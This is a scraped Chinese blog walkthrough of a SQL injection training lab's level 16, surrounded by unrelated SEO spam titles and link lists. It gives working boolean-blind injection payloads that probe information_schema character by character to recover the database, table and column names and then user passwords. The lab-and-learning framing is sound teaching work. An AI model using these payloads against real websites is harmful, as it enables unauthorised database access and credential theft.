当前位置: 首页 > news >正文

前端用什么软件开发上海外贸网站seo

前端用什么软件开发,上海外贸网站seo,一起做网站广州批发市场,莱芜金点子信息港电子版官网文章目录 前言一、回顾上一关知识点二、靶场第十六关通关思路1、判断注入点2、猜数据库长度3、猜数据库名字4、猜表名长度5、猜表名名字6、猜列名长度7、猜列名名字8、猜数据长度9、猜数据名字 总结 前言 此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击…

文章目录

  • 前言
  • 一、回顾上一关知识点
  • 二、靶场第十六关通关思路
    • 1、判断注入点
    • 2、猜数据库长度
    • 3、猜数据库名字
    • 4、猜表名长度
    • 5、猜表名名字
    • 6、猜列名长度
    • 7、猜列名名字
    • 8、猜数据长度
    • 9、猜数据名字
  • 总结


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、回顾上一关知识点

上一关是典型的布尔盲注,是单引号闭合。这一关是")闭合。

二、靶场第十六关通关思路

  • 1、判断注入点
  • 2、猜数据库长度
  • 3、猜数据库名字
  • 4、猜表名长度
  • 5、猜表名名字
  • 6、猜列名长度
  • 7、猜列名名字
  • 8、猜数据长度
  • 9、猜数据名字

1、判断注入点

这一关和上一关唯一不同的就是闭合不同,我们一个个试就行。一般都是单引号、双引号,或者引号和括号混合。
注入语句为

1 or 1=1 
1 or 1=2 

发现没有反应,再试试

1' or 1=1#
1' or 1=2#

经过不断尝试payload为

1") or 1=1#
1") or 1=2#

在这里插入图片描述
在这里插入图片描述

2、猜数据库长度

注入语句为

1") or length(database())>7#

发现数据库长度大于7页面登录成功,大于8登录失败
在这里插入图片描述

3、猜数据库名字

注入语句为

1") or ascii(substr(database(),1,1))>114#

(如图所示)发现大于114正常,大于115页面false状态。所以数据库名第一个字符ascii码为115,通过ascii码查询发现是字符’s’。我们要重复此操作八次,才能猜出数据库名,方法和上面一样,就是把substr(database(),2,1)一直递增到8,最后得到数据库名为security
在这里插入图片描述
在这里插入图片描述

4、猜表名长度

注入语句为

1") or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#

发现第一个数据库表名大于5页面正常,大于6页面false状态。(如图所示)
在这里插入图片描述
在这里插入图片描述
通过limit 0,1递增标注数字猜其他表名长度。
得到第一个表名长6,第二个表名长8,第三个表名长6,第四个长度表名长5

5、猜表名名字

1") or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>116#

(如图所示)发现第四个表名第一个字符ascii码大于116正常,大于117页面false,得到第四个表名第一个字符ascii码为117,说明是字符’u’
通过substr(表名,1,1)递增标注数字到5,猜出此表名名字为users
在这里插入图片描述
在这里插入图片描述

6、猜列名长度

注入语句为

1") or (length((select column_name from information_schema.columns where table_schema=database() and table_name="users"limit 0,1)))>1#

(如图所示)猜出第一个列名长度大于1页面正常,大于2页面false,所以第一个列名长2。以此类推递增limit得到所有列名长度(略)。第二个列名长8,第三个列名长8。
在这里插入图片描述

在这里插入图片描述

7、猜列名名字

注入语句为

1") or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))>116#

猜到第二个列名第一个字符大于116正常,大于117页面false。通过substr(列名,1,1) 和limit 0,1不断递增标识数字查出所有列名名字。这里只演示了一个列名。得到username,password列名。

在这里插入图片描述
在这里插入图片描述

8、猜数据长度

注入语句为

1") or length((select password from users limit 0,1))>3#

(如图所示)猜出第一个密码长度大于3正常,大于4页面false。以此类推查所有数据长度。方法和上面一样就不展示了
在这里插入图片描述
在这里插入图片描述

9、猜数据名字

注入语句为

1") or ascii(substr((select password from users limit 0,1),1,1))>67#

(如图所示)猜出密码第一个字符大于67正常,大于68页面false。以此类推,猜出所有数据名字。
在这里插入图片描述
在这里插入图片描述


总结

这一关和上一关差不多,只是闭合方式不同。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

http://www.tj-hxxt.cn/news/20209.html

相关文章:

  • php实战做网站视频教程百度无广告搜索引擎
  • 微网站建设合同北京seo招聘
  • 大连做网站 选领超科技商品seo关键词优化
  • 做风投要关注哪些网站宁波搜索引擎优化seo
  • 公众号app下载百度关键词seo优化
  • 早期做的网站支持现在的网速吗今日国内新闻热点
  • 一个虚拟主机可以做两个网站吧seo排名优化软件价格
  • 想自己做网站推广武汉百度网站优化公司
  • 云南企业网站建设百度关键词优化服务
  • 网站logo怎么做2021最近比较火的营销事件
  • 做健康类网站怎么备案公司网站建设哪家公司好
  • 建设工程公司取名字大全seo系统源码出售
  • 连云港专业网站制作公司优化公司哪家好
  • 焦作音响网站建设怎么快速优化网站排名
  • 怎么查看网站是否做静态化处理福清seo
  • 注册一个做网站的公司好最新新闻摘抄
  • 怎样创建自己的网站深圳最新消息今天
  • 免费网站开发模板中国营销传播网官网
  • 可信网站值得做吗厦门网站推广公司哪家好
  • 流量对于网站盈利上海百度推广官网
  • 做自己的网站服务器多少钱百度seo公司一路火
  • 广州网站建设oem网上推广怎么弄?
  • wordpress 4.9.9淘宝seo是什么意思啊
  • 嘉兴免费自助建站模板2023上海又出现疫情了
  • 做公司网站需要几天宁德市疫情
  • 无锡网站app微信号全国疫情高峰感染高峰
  • 企业网站 seo怎么做互联网推广的好处
  • 影视制作山东seo多少钱
  • 温州网页网站制作搜索引擎seo推广
  • 南京网站优化步骤网页制作的软件有哪些